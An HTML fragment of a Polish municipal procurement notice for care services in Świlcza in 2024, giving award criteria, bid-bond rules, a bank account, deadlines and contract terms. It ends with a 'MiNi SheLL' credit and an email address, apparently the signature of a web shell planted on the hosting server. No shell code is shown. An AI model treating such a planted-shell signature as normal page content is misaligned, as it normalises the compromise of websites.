class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiar zatrudnienia osoby</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dysponowanie opiekunem świadczącym usługę opiekuńczą posiadającym kurs/szkolenie opiekuna osób starszych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określono w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium. Wykonawca jest zobowiązany do wniesienia wadium<br/>w wysokości:<br/>Część 1 - Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi z terenu Gminy<br/>Świlcza w 2024 r. - 2 000,00 zł (słownie: dwa tysiące złotych);<br/>Część 2 - Świadczenie usług opiekuńczych dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w Świlczy w 2024 r.<br/>600,00 zł (słownie: sześćset złotych).<br/>Dla każdej części oddzielnie wnosi się wadium.<br/>Wnosząc wadium prosi się o zaznaczenie (dopisanie) dla której części jest wnoszone wadium.<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto Banku Spółdzielczego w Głogowie Młp. Oddział w<br/>Świlczy nr rachunku 72 9159 1023 2005 5001 4969 0001 z dopiskiem: „Wadium - nr postępowania GOPS.26.3.2024”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest Gminny Ośrodek Pomocy Społecznej w Świlczy;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby<br/>poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4.	Oświadczenie potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy<br/>w stosunku do treści oferty, na podstawie której zawarto umowę w przypadku:<br/>1) wystąpienia siły wyższej,<br/>2) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ<br/>na realizację umowy,<br/>3) wystąpienie okoliczności uniemożliwiających wykonanie przedmiotu umowy.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>zakresie dotyczącym zmiany wynagrodzenia.<br/>Informacje dotyczące zakresu i rodzaju zmian umowy<br/>oraz warunki ich wprowadzenia zostały określone w projekcie umowy stanowiącym załącznik nr 3a (część 1) i 3 b (część 2)<br/>do SWZ w § 13 i § 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-02 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami należy złożyć za pośrednictwem platformy pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-02 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Do sekcji III.3.6. ogłoszenia: 5)dokumenty elektroniczne, oświadczenia lub elektroniczne kopie<br/>dokumentów lub oświadczeń składane są przez Wykonawcę poprzez Platformę, dostępną pod<br/>adresem: https://platformazakupowa.pl/pn/gmina_swilcza lub poczty elektronicznej, na<br/>wskazany w pkt 3 adres e-mail. Sposób sporządzenia dokumentów elektronicznych musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415); Dodatkowe informacje:<br/>1. Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania<br/>zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1,<br/>jeżeli w postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>3. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie<br/>zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>4. Wykonawca przed podpisaniem umowy zobowiązany będzie przedłożyć Zamawiającemu wykaz<br/>osób przewidzianych do świadczenia usług będących przedmiotem niniejszego zamówienia oraz<br/>kopie dokumentów potwierdzających kwalifikacje zawodowe, staż i doświadczenie tych osób<br/>zgodnie z rozporządzeniem Ministra Polityki Społecznej z dn. 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych<br/>(Dz.U. Nr 189, poz. 1598 z późn. zm.) – dotyczy części nr 1.<br/>5. Wykonawca przed podpisaniem umowy zobowiązany będzie przedłożyć Zamawiającemu wykaz<br/>osób przewidzianych do świadczenia usług będących przedmiotem niniejszego zamówienia oraz<br/>kopie dokumentów potwierdzających wykształcenie tych osób – dotyczy części nr 2.<br/>6. Jeżeli Wykonawca nie złoży dokumentów, o których mowa w ust. 4 i 5 zawarcie umowy będzie<br/>niemożliwe z przyczyn leżących po stronie wykonawcy.<br/>7. Jeżeli wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>8. Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>9. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. poz. 835). Wykluczenie następuje na okres trwania okoliczności określonych w art. 7<br/>ust. 1 tejże ustawy. Szczegółowe informacje zawiera Rozdział IX pkt. 4 SWZ.<br/>10. Wizja lokalna:<br/>Zamawiający nie przewiduje możliwości i nie wymaga złożenia oferty po odbyciu wizji lokalnej lub sprawdzeniu<br/>dokumentów.<br/>11. Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z przygotowaniem i złożeniem oferty<br/>ponosi<br/>Wykonawca składający ofertę. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com